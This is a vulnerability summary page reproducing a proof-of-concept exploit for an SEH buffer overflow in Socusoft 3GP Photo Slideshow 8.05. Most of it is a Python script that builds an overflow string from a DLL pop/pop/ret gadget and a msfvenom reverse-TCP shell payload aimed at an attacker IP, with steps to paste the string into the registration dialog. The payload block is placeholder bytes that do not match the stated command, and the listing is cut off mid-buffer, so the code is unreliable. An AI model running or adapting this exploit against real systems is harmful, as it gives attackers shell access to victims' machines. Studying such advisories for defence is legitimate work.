Vulnerability summary: Socusoft 3GP Photo Slideshow 8.05 Buffer Overflow (SEH)

Vulnerability overview
Vulnerability type: Buffer Overflow - SEH (Structured Exception Handling)
EDB-ID: 45352
Published: 2018-09-10
Author: Shubham Singh (Spirited Wolf)
Exploit type: Local
Affected software: Socusoft 3GP Photo Slideshow
Affected version: 8.05

Scope of impact
Operating system: Windows XP Service Pack 3 x86
Platform: Windows_x86_64 (note: the page lists x86_64, but the test environment was x86; vulnerabilities of this kind usually target 32-bit applications)

Remediation
The page provides no specific patch link or vendor fix advice.
Users are advised to upgrade to the latest secure version or to contact the vendor for an update.
Temporary mitigation: avoid opening maliciously crafted files.

Exploit code (PoC)
```python
# Exploit Title: Socusoft 3GP Photo Slideshow 8.05 - Buffer Overflow (SEH)
# Date: 2018-09-08
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwescpirit]
# Software Link: http://www.dvd-photo-slideshow.com/3gp-photo-slideshow.html
# Tested Version: 8.05
# Tested on OS: Windows XP Service Pack 3 x86

# Steps to Reproduce:
# 1. Run the python exploit script, it will create a new file with the name "exploit.txt".
# 2. Just copy the text inside "exploit.txt".
# 3. Start the program. In the new window click "Help" > "Register ...
# 4. Now paste the content of "exploit.txt" into the field: "Registration Name" + "Registration Key". Click "Apply" > "Ok"
#    You will see a sweet reverse shell popped up in your attacker box.
# filler up to the SEH record
buffer = "A" * 512

# 0x1003802d : pop ebx ; pop ecx ; ret
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.5.0 (C:\Program Files\Socusoft\Socusoft 3GP Photo Slideshow\DVDPhotoData.dll)
# nSEH and SEH are both overwritten with the pop/pop/ret address from DVDPhotoData.dll
nseh = "\x2d\x80\x03\x10"
seh = "\x2d\x80\x03\x10"
nops = "\x90" * 10

# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.0.2.5 LPORT=1337 -b '\x00\x0a\x0d' -f python
buf = ""
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
buf += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  # the listing is cut off here in the source page